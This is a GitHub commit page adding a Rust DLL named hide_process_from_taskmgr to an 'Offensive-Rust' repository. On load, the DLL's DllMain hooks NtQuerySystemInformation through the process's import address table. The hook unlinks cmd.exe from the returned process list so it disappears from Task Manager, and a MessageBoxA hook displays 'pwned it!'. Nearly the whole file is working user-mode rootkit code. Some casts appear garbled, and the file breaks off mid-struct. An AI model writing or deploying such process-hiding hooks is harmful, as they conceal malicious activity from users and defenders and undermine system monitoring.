STRLCPY/Offensive-Rust

Create hide_process_from_taskmgr
nikhil-polymath committed with GitHub 1 year ago

76e7a73a

1 parent edfb3aa1

Total 1 files

■ ■ ■ ■ ■ ■

hide_process_from_taskmgr

1	+
2	+	use winapi::{um::winuser::*, shared::windef::HWND__};
3	+	use winapi::ctypes::*;
4	+	use winapi::um::memoryapi::*;
5	+	use winapi::um::libloaderapi::*;
6	+	use winapi::um::processthreadsapi::*;
7	+	use winapi::shared::ntdef::{HRESULT, NTSTATUS, NT_SUCCESS, NULL};
8	+	use windows::Win32::System::WindowsProgramming::SYSTEM_PROCESS_INFORMATION;
9	+
10	+	use winapi::um::memoryapi::*;
11	+	use winapi::um::processthreadsapi::*;
12	+	use ntapi::ntexapi::*;
13	+	use winapi::ctypes::*;
14	+	use winapi::um::winnt::*;
15	+	use winapi::shared::minwindef::*;
16	+	use std::collections::HashMap;
17	+	use std::fmt::Write;
18	+	use std::hash::Hash;
19	+	use std::io::Read;
20	+
21	+	use winapi::shared::minwindef::HINSTANCE;
22	+
23	+	use winapi::um::handleapi::CloseHandle;
24	+	use winapi::um::processthreadsapi::*;
25	+	use winapi::um::memoryapi::*;
26	+	use winapi::um::libloaderapi::*;
27	+	use winapi::um::winnt::IMAGE_IMPORT_BY_NAME;
28	+	use winapi::um::winuser::*;
29	+	use winapi::um::winuser::MessageBoxA;
30	+	use winapi::ctypes::*;
31	+	use winapi::um::tlhelp32::*;
32	+
33	+	pub fn ReadStringFromMemory(prochandle: mut c_void, base: const c_void) -> String {
34	+	unsafe {
35	+	let mut i: isize = 0;
36	+	let mut s = String::new();
37	+	loop {
38	+	let mut a: [u8; 1] = [0];
39	+	ReadProcessMemory(
40	+	prochandle,
41	+	(base as isize + i) as *const c_void,
42	+	a.as_mut_ptr() as *mut c_void,
43	+	1,
44	+	std::ptr::null_mut(),
45	+	);
46	+
47	+	if a[0] == 0 \|\| i == 50 {
48	+	return s;
49	+	}
50	+	s.push(a[0] as char);
51	+	i += 1;
52	+	}
53	+	}
54	+	}
55	+
56	+
57	+
58	+
59	+	#[no_mangle]
60	+	pub unsafe extern "C" fn messageboxclone(hwnd:*mut HWND__,
61	+	lptext:const i8,lptitle:const i8,boxtype:u32) ->i32 {
62	+
63	+
64	+	/*WriteProcessMemory(prochandle1,
65	+	firstthunkaddress as *mut c_void,
66	+	originaladdress.to_ne_bytes().as_ptr() as *const c_void,
67	+	originaladdress.to_ne_bytes().len(), std::ptr::null_mut());
68	+	*/
69	+
70	+	let temp = ReadStringFromMemory(GetCurrentProcess(), lptext as *const c_void);
71	+	println!("lp text: {}",
72	+	ReadStringFromMemory(GetCurrentProcess(), lptext as *const c_void));
73	+
74	+	if temp=="hello world"{
75	+
76	+	let res =MessageBoxA(std::ptr::null_mut(),
77	+	"pwned it!\0".as_ptr() as *const i8,
78	+	"WORKED\0".as_ptr() as *const i8,0 );
79	+	return res;
80	+	}
81	+
82	+	else{
83	+
84	+	return MessageBoxA(std::ptr::null_mut(),
85	+	lptext,lptitle,boxtype);
86	+
87	+
88	+	}
89	+
90	+	let mut temp:[u8;size_of::<isize>()] = [0;size_of::<isize>()];
91	+
92	+
93	+	/* let res2 =WriteProcessMemory(prochandle1,
94	+	firstthunkaddress as *mut c_void,
95	+	temp.as_ptr() as *const c_void,
96	+	temp.len(), std::ptr::null_mut());
97	+	*/
98	+
99	+	// return res;
100	+
101	+	}
102	+
103	+
104	+
105	+	#[no_mangle]
106	+	pub unsafe extern "C" fn test2(sysinfo: u32,
107	+	baseaddress:*mut c_void,
108	+	infolength: u32,
109	+	outinfolength: *mut u32) -> i32{
110	+
111	+
112	+	// return NtQuerySystemInformation(sysinfo , baseaddress, infolength, outinfolength);
113	+
114	+	if sysinfo==5{
115	+
116	+
117	+	/*MessageBoxA(std::ptr::null_mut(),
118	+	"calling SYS_PROCESS_INFO\0".as_ptr() as *const i8,
119	+	"hooked\0".as_ptr() as const i8,0 );/
120	+
121	+
122	+	let runner =std::mem::transmute::<*mut c_void,
123	+	fn(u32, mut c_void,u32,mut u32)->i32
124	+	>(originaladdress as *mut c_void);
125	+
126	+
127	+	let res= runner(sysinfo , baseaddress, infolength, outinfolength);
128	+
129	+
130	+	let mut processes:Vec<SYSTEM_PROCESS_INFORMATION> =Vec::new();
131	+
132	+
133	+	let mut originalbase = baseaddress.clone();
134	+	// let mut previousaddress = baseaddress.clone();
135	+	//let mut currentaddress = baseaddress.clone();
136	+
137	+	let mut temp:[u8;size_of::<SYSTEM_PROCESS_INFORMATION>()] = [0;size_of::<SYSTEM_PROCESS_INFORMATION>()];
138	+
139	+	//let mut nextaddress:*mut c_void = previousaddress;
140	+
141	+
142	+
143	+	let mut spi= SYSTEM_PROCESS_INFORMATION::default();
144	+
145	+	FillStructureFromMemory(&mut spi,baseaddress as *const c_void,GetCurrentProcess());
146	+
147	+
148	+	while true{
149	+
150	+	if spi.NextEntryOffset == 0{
151	+	break;
152	+	}
153	+
154	+	let mut previousaddress = originalbase;
155	+	let mut nextaddress =originalbase as isize + spi.NextEntryOffset as isize;
156	+
157	+	FillStructureFromMemory(&mut spi,nextaddress as *const c_void,GetCurrentProcess());
158	+
159	+
160	+
161	+	let mut v1:Vec<u16> = vec![0;spi.ImageName.Length as usize];
162	+	ReadProcessMemory(GetCurrentProcess(),
163	+	spi.ImageName.Buffer.0 as *const c_void,
164	+	v1.as_mut_ptr() as *mut c_void,
165	+	spi.ImageName.Length as usize, std::ptr::null_mut());
166	+
167	+
168	+	let procname = String::from_utf16_lossy(&v1);
169	+
170	+
171	+	if procname.trim_end_matches('\0')=="cmd.exe"{
172	+
173	+	/*MessageBoxA(std::ptr::null_mut(),
174	+	"yes notepad.exe\0".as_ptr() as *const i8,
175	+	"hooked\0".as_ptr() as *const i8,0 );
176	+
177	+	let temp2 = processes.pop().unwrap();
178	+	let mut finaloffset = temp2.NextEntryOffset + spi.NextEntryOffset;
179	+	*/
180	+	let mut prevoffset:[u8;4] = [0;4];
181	+
182	+	ReadProcessMemory(GetCurrentProcess(),
183	+	previousaddress,
184	+	prevoffset.as_mut_ptr() as *mut c_void, 4, std::ptr::null_mut());
185	+
186	+
187	+	let mut finaloffset = u32::from_ne_bytes(prevoffset) + spi.NextEntryOffset as u32;
188	+
189	+
190	+	VirtualProtectEx(GetCurrentProcess(),
191	+	originalbase, 4, 0x40, std::ptr::null_mut());
192	+
193	+	WriteProcessMemory(GetCurrentProcess(),
194	+	originalbase,
195	+	finaloffset.to_ne_bytes().as_ptr() as *const c_void,
196	+	4, std::ptr::null_mut());
197	+	break;
198	+
199	+	}
200	+
201	+
202	+	originalbase = nextaddress as *mut c_void;
203	+	processes.push(spi.clone());
204	+
205	+	}
206	+
207	+
208	+
209	+	/*while true{
210	+
211	+
212	+	let mut spi = SYSTEM_PROCESS_INFORMATION::default();
213	+
214	+	FillStructureFromMemory(&mut spi, nextaddress, GetCurrentProcess());
215	+
216	+	if spi.NextEntryOffset == 0{
217	+
218	+	/*MessageBoxA(std::ptr::null_mut(),
219	+	processes.len().to_string().as_ptr() as *const i8,
220	+	"hooked\0".as_ptr() as const i8,0 );/
221	+	break;
222	+	}
223	+
224	+
225	+
226	+	let mut namearray:Vec<u16> = vec![0;spi.ImageName.Length as usize];
227	+	ReadProcessMemory(prochandle1,
228	+	spi.ImageName.Buffer.0 as *const c_void,
229	+	namearray.as_mut_ptr() as *mut c_void,
230	+	spi.ImageName.Length as usize, std::ptr::null_mut());
231	+	let mut processname = String::from_utf16_lossy(&namearray);
232	+	//processname.push('\0');
233	+
234	+
235	+	if processname.trim_end_matches('\0').contains("notepad.exe"){
236	+	//processname.push('\0');
237	+	MessageBoxA(std::ptr::null_mut(),
238	+	"yes notepad\0".as_ptr() as *const i8,
239	+	"hooked\0".as_ptr() as *const i8,0 );
240	+	}
241	+
242	+
243	+
244	+
245	+	processes.push(spi.clone());
246	+
247	+	previousaddress = nextaddress.clone();
248	+	nextaddress= (nextaddress as isize + spi.NextEntryOffset as isize) as *mut c_void;
249	+
250	+	/*while true{
251	+
252	+
253	+	ReadProcessMemory(prochandle1,
254	+	nextaddress as const c_void, temp.as_mut_ptr() as mut c_void,
255	+	temp.len(), std::ptr::null_mut());
256	+
257	+	FillStructureFromArray(&mut spi, &temp);
258	+
259	+	processes.push(spi.clone());
260	+
261	+	if spi.NextEntryOffset ==0{
262	+	break;
263	+	}
264	+
265	+	let mut namearray:Vec<u16> = vec![0;spi.ImageName.Length as usize];
266	+	ReadProcessMemory(prochandle1,
267	+	spi.ImageName.Buffer.0 as *const c_void,
268	+	namearray.as_mut_ptr() as *mut c_void,
269	+	namearray.len(), std::ptr::null_mut());
270	+	let mut processname = String::from_utf16_lossy(&namearray[..]);
271	+	//processname.push('\0');
272	+
273	+
274	+
275	+	if processname.trim_end_matches('\0').contains("notepad.exe"){
276	+
277	+
278	+	if spi.NextEntryOffset ==0{
279	+	let mut diffoffset:i32 = 0;
280	+	/*WriteProcessMemory(prochandle1,
281	+	previousaddress ,
282	+	diffoffset.to_ne_bytes().as_ptr() as *const c_void,
283	+	4, std::ptr::null_mut());
284	+	break;*/
285	+
286	+	}
287	+
288	+	let mut nextbase = nextaddress + spi.NextEntryOffset as isize;
289	+	let mut diffoffset = nextbase - previousaddress as isize;
290	+
291	+	/* WriteProcessMemory(prochandle1,
292	+	previousaddress ,
293	+	diffoffset.to_ne_bytes().as_ptr() as *const c_void,
294	+	4, std::ptr::null_mut());
295	+
296	+	break;*/
297	+
298	+
299	+	}
300	+
301	+	previousaddress = nextaddress as *mut c_void;
302	+	nextaddress = nextaddress + spi.NextEntryOffset as isize;
303	+
304	+
305	+
306	+	}*/
307	+
308	+	}*/
309	+
310	+
311	+	return res;
312	+
313	+	}
314	+
315	+
316	+	return NtQuerySystemInformation(sysinfo , baseaddress, infolength, outinfolength);
317	+
318	+	}
319	+
320	+
321	+
322	+	pub fn FillStructureFromArray<T, U>(base: &mut T, arr: &[U]) -> usize {
323	+	unsafe {
324	+	//println!("{}",std::mem::size_of::<T>());
325	+	//println!("{}",std::mem::size_of_val(arr));
326	+	if std::mem::size_of::<T>() != std::mem::size_of_val(arr) {
327	+	println!("{}", std::mem::size_of::<T>());
328	+	println!("{}", std::mem::size_of_val(arr));
329	+	panic!("sizes are not equal to copy");
330	+	}
331	+
332	+	let mut handle = GetCurrentProcess();
333	+	let mut byteswritten = 0;
334	+	let res = WriteProcessMemory(
335	+	handle,
336	+	base as mut _ as mut c_void,
337	+	arr as const _ as const c_void,
338	+	std::mem::size_of::<T>(),
339	+	&mut byteswritten,
340	+	);
341	+
342	+	return byteswritten;
343	+	}
344	+	}
345	+
346	+	pub fn FillStructureFromMemory<T>(
347	+	dest: &mut T,
348	+	src: *const c_void,
349	+	prochandle: *mut c_void,
350	+	) -> usize {
351	+	unsafe {
352	+	let bytestoread: usize = std::mem::size_of::<T>();
353	+	//println!("size of structure is {}",bytestoread);
354	+	let mut buffer: Vec<u8> = vec![0; bytestoread];
355	+	let mut byteswritten = 0;
356	+
357	+	let res = ReadProcessMemory(
358	+	prochandle,
359	+	src,
360	+	buffer.as_mut_ptr() as *mut c_void,
361	+	bytestoread,
362	+	&mut byteswritten,
363	+	);
364	+	//println!("array being filled: {:x?}",&buffer);
365	+	FillStructureFromArray(dest, &buffer);
366	+
367	+	return byteswritten;
368	+	}
369	+	}
370	+
371	+
372	+	pub fn ParseExports64(prochandle:mut c_void,baseaddress:mut c_void) -> HashMap<String,i32>{
373	+
374	+	unsafe{
375	+
376	+	let mut exports:HashMap<String,i32> = HashMap::new();
377	+
378	+
379	+	let mut dos:[u8;64] = [0;64];
380	+	ReadProcessMemory(prochandle,
381	+	baseaddress, &mut dos as mut u8 as mut c_void,
382	+	64, std::ptr::null_mut());
383	+
384	+	if dos[0]!=77 && dos[1]!=90{
385	+	return exports;
386	+	}
387	+
388	+	let mut dosheader = IMAGE_DOS_HEADER::default();
389	+	FillStructureFromArray(&mut dosheader, &dos);
390	+
391	+
392	+	let mut nt:[u8;size_of::<IMAGE_NT_HEADERS64>()] = [0;size_of::<IMAGE_NT_HEADERS64>()];
393	+	ReadProcessMemory(prochandle,
394	+	(baseaddress as isize + dosheader.e_lfanew as isize)as const c_void, &mut nt as mut u8 as *mut c_void,
395	+	size_of::<IMAGE_NT_HEADERS64>(), std::ptr::null_mut());
396	+
397	+	let mut ntheader = IMAGE_NT_HEADERS64::default();
398	+	FillStructureFromArray(&mut ntheader, &nt);
399	+
400	+
401	+	if ntheader.OptionalHeader.ExportTable.Size==0{
402	+	return exports;
403	+	}
404	+
405	+	let mut export = IMAGE_EXPORT_DIRECTORY::default();
406	+
407	+	let mut exp:[u8;size_of::<IMAGE_EXPORT_DIRECTORY>()] = [0;size_of::<IMAGE_EXPORT_DIRECTORY>()];
408	+	ReadProcessMemory(prochandle,
409	+	(baseaddress as isize + ntheader.OptionalHeader.ExportTable.VirtualAddress as isize)as const c_void, &mut exp as mut u8 as *mut c_void,
410	+	size_of::<IMAGE_EXPORT_DIRECTORY>(), std::ptr::null_mut());
411	+
412	+	FillStructureFromArray(&mut export, &exp);
413	+
414	+	// println!("{:x?}",export);
415	+
416	+
417	+	let entptr =baseaddress as isize + export.AddressOfNames as isize;
418	+	let eotptr =baseaddress as isize + export.AddressOfNameOrdinals as isize;
419	+	let eatptr =baseaddress as isize + export.AddressOfFunctions as isize;
420	+
421	+
422	+
423	+	for i in 0..export.NumberOfNames{
424	+
425	+	let mut nameaddr:[u8;4] = [0;4];
426	+	ReadProcessMemory(prochandle,
427	+	(entptr + (i4) as isize) as const c_void,
428	+	nameaddr.as_mut_ptr() as *mut c_void, 4, std::ptr::null_mut());
429	+
430	+
431	+	let nameoffset = i32::from_ne_bytes(nameaddr.try_into().unwrap());
432	+
433	+	let funcname = ReadStringFromMemory(prochandle, (baseaddress as isize +nameoffset as isize )as *const c_void);
434	+
435	+
436	+	let mut ordaddr:[u8;2] = [0;2];
437	+	ReadProcessMemory(prochandle,
438	+	(eotptr + (i2) as isize) as const c_void,
439	+	ordaddr.as_mut_ptr() as *mut c_void, 2, std::ptr::null_mut());
440	+
441	+	let ordoffset = i32::from_ne_bytes(nameaddr.try_into().unwrap());
442	+
443	+
444	+
445	+
446	+	let mut addresses:[u8;4] = [0;4];
447	+	ReadProcessMemory(prochandle,
448	+	(eatptr + (i4) as isize) as const c_void,
449	+	addresses.as_mut_ptr() as *mut c_void, 4, std::ptr::null_mut());
450	+
451	+	let finaladdress = i32::from_ne_bytes(addresses.try_into().unwrap());
452	+
453	+	exports.insert(funcname,finaladdress);
454	+
455	+	}
456	+
457	+	//println!("{:?}",exports);
458	+
459	+	return exports;
460	+	}
461	+
462	+
463	+
464	+	}
465	+
466	+
467	+
468	+
469	+	use std::collections::*;
470	+	use std::mem::*;
471	+	pub fn ParseImports64(prochandle: mut c_void,baseaddress: mut c_void) -> HashMap<String,Vec<HashMap<String,HashMap<String,i64>>>>{
472	+	// dll : {funcname : {firstthunk: addr1,addressrva: addr2}}
473	+
474	+	let mut imports:HashMap<String,Vec<HashMap<String,HashMap<String,i64>>>> = HashMap::new();
475	+
476	+	unsafe{
477	+
478	+
479	+	let mut dos:[u8;64] = [0;64];
480	+	ReadProcessMemory(prochandle,
481	+	baseaddress, &mut dos as mut u8 as mut c_void,
482	+	64, std::ptr::null_mut());
483	+
484	+	if dos[0]!=77 && dos[1]!=90{
485	+	return imports;
486	+	}
487	+
488	+	let mut dosheader = IMAGE_DOS_HEADER::default();
489	+	FillStructureFromArray(&mut dosheader, &dos);
490	+
491	+
492	+	let mut nt:[u8;size_of::<IMAGE_NT_HEADERS64>()] = [0;size_of::<IMAGE_NT_HEADERS64>()];
493	+	ReadProcessMemory(prochandle,
494	+	(baseaddress as isize + dosheader.e_lfanew as isize)as const c_void, &mut nt as mut u8 as *mut c_void,
495	+	size_of::<IMAGE_NT_HEADERS64>(), std::ptr::null_mut());
496	+
497	+	let mut ntheader = IMAGE_NT_HEADERS64::default();
498	+	FillStructureFromArray(&mut ntheader, &nt);
499	+
500	+
501	+	if ntheader.OptionalHeader.ImportTable.Size==0{
502	+	return imports;
503	+	}
504	+
505	+	let mut importptr = baseaddress as isize + ntheader.OptionalHeader.ImportTable.VirtualAddress as isize;
506	+
507	+	let mut i =0;
508	+
509	+	loop{
510	+
511	+	let mut import:[u8;size_of::<IMAGE_IMPORT_DESCRIPTOR>()] = [0;size_of::<IMAGE_IMPORT_DESCRIPTOR>()];
512	+	ReadProcessMemory(prochandle,
513	+	(importptr + isize_of::<IMAGE_IMPORT_DESCRIPTOR>() as isize) as const c_void,
514	+	import.as_mut_ptr() as *mut c_void,
515	+	import.len(), std::ptr::null_mut());
516	+
517	+	let mut firstimport = IMAGE_IMPORT_DESCRIPTOR::default();
518	+	FillStructureFromArray(&mut firstimport, &import);
519	+
520	+	if firstimport.Name == 0{
521	+	break;
522	+	}
523	+
524	+	let dllname =ReadStringFromMemory(prochandle, (baseaddress as isize + firstimport.Name as isize) as *const c_void);
525	+	//imports.insert(dllname, std::ptr::null());
526	+
527	+	let mut v:Vec<HashMap<String,HashMap<String,i64>>>= Vec::new();
528	+
529	+	let originalthunkptr = baseaddress as isize + firstimport.Characteristics_or_OriginalFirstThunk as isize;
530	+	let firstthunkptr = baseaddress as isize + firstimport.FirstThunk as isize;
531	+	let mut j=0;
532	+
533	+	loop{
534	+
535	+	let mut nameaddr:[u8;8] = [0;8];
536	+	ReadProcessMemory(prochandle,
537	+	(originalthunkptr + j8) as const c_void,
538	+	nameaddr.as_mut_ptr() as *mut c_void,
539	+	nameaddr.len(), std::ptr::null_mut());
540	+
541	+	let nameoffset = isize::from_ne_bytes(nameaddr.try_into().unwrap());
542	+
543	+	if nameoffset ==0{
544	+	break;
545	+	}
546	+
547	+
548	+	let funcname =ReadStringFromMemory(prochandle, (baseaddress as isize + nameoffset as isize +2) as *const c_void);
549	+	let mut funcdict:HashMap<String,HashMap<String,i64>> = HashMap::new();
550	+	let mut addressdict:HashMap<String,i64> = HashMap::new();
551	+
552	+	addressdict.insert("firstthunk".to_string(), firstthunkptr as i64 + (j*8) as i64);
553	+
554	+	let mut funcaddress:[u8;8] = [0;8];
555	+	ReadProcessMemory(prochandle,
556	+	(firstthunkptr + j8) as const c_void,
557	+	funcaddress.as_mut_ptr() as *mut c_void,
558	+	funcaddress.len(), std::ptr::null_mut());
559	+
560	+	addressdict.insert("addressrva".to_string(), i64::from_ne_bytes(funcaddress.try_into().unwrap()));
561	+
562	+	funcdict.insert(funcname,addressdict);
563	+	v.push(funcdict);
564	+	j+=1;
565	+	}
566	+	imports.insert(dllname,v);
567	+
568	+	i+=1 ;
569	+	}
570	+
571	+
572	+	return imports;
573	+
574	+	}
575	+
576	+	}
577	+
578	+
579	+
580	+
581	+	static mut originaladdress:isize =0;
582	+	static mut firstthunkaddress:isize =0;
583	+	static mut prochandle1: mut c_void = 0 as mut c_void;
584	+
585	+	#[no_mangle]
586	+	pub unsafe extern "stdcall" fn DllMain(
587	+	handle:HINSTANCE,
588	+	reason: u32,
589	+	reserved:*mut c_void
590	+	) -> u32{
591	+
592	+	if reason ==1{
593	+
594	+
595	+	let targetdll = "ntdll.dll";
596	+	let legitfunctiontohook = "NtQuerySystemInformation";
597	+	let ourmaliciousfunction = "test2";
598	+
599	+
600	+	let procbase =GetModuleHandleA(std::ptr::null_mut());
601	+
602	+	let dllbase =GetModuleHandleA("tempdll.dll".as_ptr() as *const i8);
603	+
604	+	let allimports = ParseImports64(procbase as mut c_void, procbase as mut c_void);
605	+
606	+
607	+	let pid =GetCurrentProcessId();
608	+	prochandle1 = OpenProcess(0x001FFFFF, 0, pid);
609	+
610	+
611	+	let allimports= ParseImports64(prochandle1, procbase as *mut c_void);
612	+	let dllexports = ParseExports64(prochandle1, dllbase as *mut c_void);
613	+
614	+
615	+	let legitdllimports =allimports.get(targetdll).unwrap();
616	+
617	+	let mut funcinfo:HashMap<String, HashMap<String, i64>> = HashMap::new();
618	+	for i in 0..legitdllimports.len(){
619	+	let keys =legitdllimports[i].keys().collect::<Vec<&String>>();
620	+	if keys[0] == legitfunctiontohook{
621	+	println!("{:x?}",legitdllimports[i]);
622	+	funcinfo = legitdllimports[i].clone();
623	+	}
624	+	}
625	+
626	+	//let mut firstthunkaddress:isize =0;
627	+
628	+
629	+	for i in funcinfo.values(){
630	+	if i.contains_key("firstthunk"){
631	+	firstthunkaddress = *i.get("firstthunk").unwrap() as isize;
632	+	}
633	+	if i.contains_key("addressrva"){
634	+	originaladdress = *i.get("addressrva").unwrap() as isize;
635	+	}
636	+	}
637	+
638	+	println!("First thunk address: {:x?}",firstthunkaddress);
639	+	println!("address rva: {:x?}",originaladdress);
640	+
641	+	let mut maladdress: isize = 0;
642	+
643	+	for (i,j) in dllexports.iter(){
644	+	if i==ourmaliciousfunction{
645	+	maladdress = *j as isize;
646	+	}
647	+	}
648	+
649	+	let mut oldprotect = 0;
650	+	let res =VirtualProtectEx(prochandle1,
651	+	firstthunkaddress as *mut c_void, 4, 0x40, &mut oldprotect);
652	+
653	+	println!("virtualprotectex res: {}",res);
654	+
655	+
656	+	maladdress = dllbase as isize+ maladdress;
657	+
658	+	println!("dllbase :{:x?}",dllbase);
659	+	println!("maladdress: {:x?}",maladdress);
660	+
661	+	let mut temp:[u8;size_of::<isize>()] = maladdress.to_ne_bytes();
662	+
663	+
664	+	println!("temp: {:x?}",temp);
665	+
666	+
667	+	let mut temp2:[u8;size_of::<isize>()] = [0;size_of::<isize>()];
668	+	ReadProcessMemory(prochandle1,
669	+	firstthunkaddress as *const c_void,
670	+	temp2.as_mut_ptr() as *mut c_void,
671	+	temp2.len(), std::ptr::null_mut());
672	+
673	+	println!("before writing, firstthunkaddress: {:x?}",temp2);
674	+
675	+	let res2 =WriteProcessMemory(prochandle1,
676	+	firstthunkaddress as *mut c_void,
677	+	temp.as_ptr() as *const c_void,
678	+	temp.len(), std::ptr::null_mut());
679	+
680	+	println!("writeprocessmem result: {}",res2);
681	+
682	+	ReadProcessMemory(prochandle1,
683	+	firstthunkaddress as *const c_void,
684	+	temp.as_mut_ptr() as *mut c_void,
685	+	temp.len(), std::ptr::null_mut());
686	+
687	+	println!("after written, firstthunk: {:x?}",temp);
688	+
689	+	/*MessageBoxA(std::ptr::null_mut(),
690	+	format!("{:x?}",dllexports).as_ptr() as *const i8,
691	+	"hooked\0".as_ptr() as const i8,0 );/
692	+
693	+
694	+
695	+	CloseHandle(prochandle1);
696	+
697	+	return 1 ;
698	+
699	+	}
700	+	if reason ==0{
701	+	1;
702	+	}
703	+	return 0;
704	+
705	+	}
706	+
707	+
708	+
709	+
710	+
711	+
712	+
713	+
714	+
715	+
716	+
717	+
718	+
719	+
720	+
721	+
722	+
723	+
724	+
725	+
726	+
727	+
728	+
729	+
730	+
731	+
732	+
733	+
734	+
735	+
736	+
737	+
738	+
739	+
740	+
741	+
742	+
743	+
744	+
745	+
746	+
747	+
748	+
749	+
750	+
751	+
752	+
753	+
754	+
755	+
756	+
757	+
758	+
759	+
760	+
761	+
762	+	#[derive(Clone, Default, Debug)]
763	+	#[repr(C)]
764	+	pub struct IMAGE_SECTION_HEADER {
765	+	Name: [u8; 8],
766	+	VirtualSize: u32,
767	+	VirtualAddress: u32,
768	+	SizeOfRawData: u32,
769	+	PointerToRawData: u32,
770	+	PointerToRelocations: u32,
771	+	PointerToLinenumbers: u32,
772	+	NumberOfRelocations: u16,
773	+	NumberOfLinenumbers: u16,
774	+	Characteristics: u32,
775	+	}
776	+
777	+	impl IMAGE_SECTION_HEADER {
778	+	fn getsecname(&mut self) -> String {
779	+	String::from_utf8_lossy(&self.Name).to_string()
780	+	}
781	+	}
782	+
783	+	#[repr(C)]
784	+	pub union chars_or_originalfirstthunk {
785	+	Characteristics: u32,
786	+	OriginalFirstThunk: u32,
787	+	}
788	+
789	+	#[derive(Debug, Clone, Default)]
790	+	#[repr(C)]
791	+	pub struct IMAGE_IMPORT_DESCRIPTOR {
792	+	Characteristics_or_OriginalFirstThunk: u32,
793	+
794	+	TimeDateStamp: u32,
795	+
796	+	ForwarderChain: u32,
797	+
798	+	Name: u32,
799	+
800	+	FirstThunk: u32,
801	+	}
802	+
803	+	#[repr(C)]
804	+	pub union IMAGE_THUNK_DATA32 {
805	+	pub ForwarderString: u32,
806	+
807	+	pub Function: u32,
808	+
809	+	pub Ordinal: u32,
810	+
811	+	pub AddressOfData: u32,
812	+	}
813	+
814	+	#[derive(Debug, Clone, Default)]
815	+	#[repr(C)]
816	+	pub struct IMAGE_EXPORT_DIRECTORY {
817	+	pub Characteristics: u32,
818	+	pub TimeDateStamp: u32,
819	+	pub MajorVersion: u16,
820	+	pub MinorVersion: u16,
821	+	pub Name: u32,
822	+	pub Base: u32,
823	+	pub NumberOfFnctions: u32,
824	+	pub NumberOfNames: u32,
825	+	pub AddressOfFunctions: u32, // RVA from base of image
826	+	pub AddressOfNames: u32, // RVA from base of image
827	+	pub AddressOfNameOrdinals: u32, // RVA from base of image
828	+	}
829	+
830	+	#[derive(Debug, Default, Clone)]
831	+	#[repr(C)]
832	+	pub struct IMAGE_OPTIONAL_HEADER64 {
833	+	Magic: u16,
834	+
835	+	MajorLinkerVersion: u8,
836	+
837	+	MinorLinkerVersion: u8,
838	+
839	+	SizeOfCode: u32,
840	+
841	+	SizeOfInitializedData: u32,
842	+
843	+	SizeOfUninitializedData: u32,
844	+
845	+	AddressOfEntryPoint: u32,
846	+
847	+	BaseOfCode: u32,
848	+
849	+	ImageBase: i64,
850	+
851	+	SectionAlignment: u32,
852	+
853	+	FileAlignment: u32,
854	+
855	+	MajorOperatingSystemVersion: u16,
856	+
857	+	MinorOperatingSystemVersion: u16,
858	+
859	+	MajorImageVersion: u16,
860	+
861	+	MinorImageVersion: u16,
862	+
863	+	MajorSubsystemVersion: u16,
864	+
865	+	MinorSubsystemVersion: u16,
866	+
867	+	Win32VersionValue: u32,
868	+
869	+	SizeOfImage: u32,
870	+
871	+	SizeOfHeaders: u32,
872	+
873	+	CheckSum: u32,
874	+
875	+	Subsystem: u16,
876	+
877	+	DllCharacteristics: u16,
878	+
879	+	SizeOfStackReserve: u64,
880	+
881	+	SizeOfStackCommit: u64,
882	+
883	+	SizeOfHeapReserve: u64,
884	+
885	+	SizeOfHeapCommit: u64,
886	+
887	+	LoaderFlags: u32,
888	+
889	+	NumberOfRvaAndSizes: u32,
890	+
891	+	ExportTable: IMAGE_DATA_DIRECTORY,
892	+
893	+	ImportTable: IMAGE_DATA_DIRECTORY,
894	+
895	+	ResourceTable: IMAGE_DATA_DIRECTORY,
896	+
897	+	ExceptionTable: IMAGE_DATA_DIRECTORY,
898	+
899	+	CertificateTable: IMAGE_DATA_DIRECTORY,
900	+
901	+	BaseRelocationTable: IMAGE_DATA_DIRECTORY,
902	+
903	+	Debug: IMAGE_DATA_DIRECTORY,
904	+
905	+	Architecture: IMAGE_DATA_DIRECTORY,
906	+
907	+	GlobalPtr: IMAGE_DATA_DIRECTORY,
908	+
909	+	TLSTable: IMAGE_DATA_DIRECTORY,
910	+	LoadConfigTable: IMAGE_DATA_DIRECTORY,
911	+	BoundImport: IMAGE_DATA_DIRECTORY,
912	+
913	+	IAT: IMAGE_DATA_DIRECTORY,
914	+
915	+	DelayImportDescriptor: IMAGE_DATA_DIRECTORY,
916	+	CLRRuntimeHeader: IMAGE_DATA_DIRECTORY,
917	+
918	+	Reserved: IMAGE_DATA_DIRECTORY,
919	+	}
920	+
921	+	#[derive(Debug, Default, Clone)]
922	+	#[repr(C)]
923	+	pub struct IMAGE_OPTIONAL_HEADER32 {
924	+	Magic: u16,
925	+
926	+	MajorLinkerVersion: u8,
927	+
928	+	MinorLinkerVersion: u8,
929	+
930	+	SizeOfCode: u32,
931	+
932	+	SizeOfInitializedData: u32,
933	+
934	+	SizeOfUninitializedData: u32,
935	+
936	+	AddressOfEntryPoint: u32,
937	+
938	+	BaseOfCode: u32,
939	+
940	+	// PE32 contains this additional field
941	+	BaseOfData: u32,
942	+
943	+	ImageBase: u32,
944	+
945	+	SectionAlignment: u32,
946	+
947	+	FileAlignment: u32,
948	+
949	+	MajorOperatingSystemVersion: u16,
950	+
951	+	MinorOperatingSystemVersion: u16,
952	+
953	+	MajorImageVersion: u16,
954	+
955	+	MinorImageVersion: u16,
956	+
957	+	MajorSubsystemVersion: u16,
958	+
959	+	MinorSubsystemVersion: u16,
960	+
961	+	Win32VersionValue: u32,
962	+
963	+	SizeOfImage: u32,
964	+
965	+	SizeOfHeaders: u32,
966	+
967	+	CheckSum: u32,
968	+
969	+	Subsystem: u32,
970	+
971	+	DllCharacteristics: u16,
972	+
973	+	SizeOfStackReserve: u32,
974	+
975	+	SizeOfStackCommit: u32,
976	+
977	+	SizeOfHeapReserve: u32,
978	+
979	+	SizeOfHeapCommit: u32,
980	+
981	+	LoaderFlags: u32,
982	+
983	+	NumberOfRvaAndSizes: u32,
984	+
985	+	ExportTable: IMAGE_DATA_DIRECTORY,
986	+
987	+	ImportTable: IMAGE_DATA_DIRECTORY,
988	+
989	+	ResourceTable: IMAGE_DATA_DIRECTORY,
990	+
991	+	ExceptionTable: IMAGE_DATA_DIRECTORY,
992	+
993	+	CertificateTable: IMAGE_DATA_DIRECTORY,
994	+
995	+	BaseRelocationTable: IMAGE_DATA_DIRECTORY,
996	+
997	+	Debug: IMAGE_DATA_DIRECTORY,
998	+
999	+	Architecture: IMAGE_DATA_DIRECTORY,
1000	+
1001	+	GlobalPtr: IMAGE_DATA_DIRECTORY,
1002	+
1003	+	TLSTable: IMAGE_DATA_DIRECTORY,
1004	+	LoadConfigTable: IMAGE_DATA_DIRECTORY,
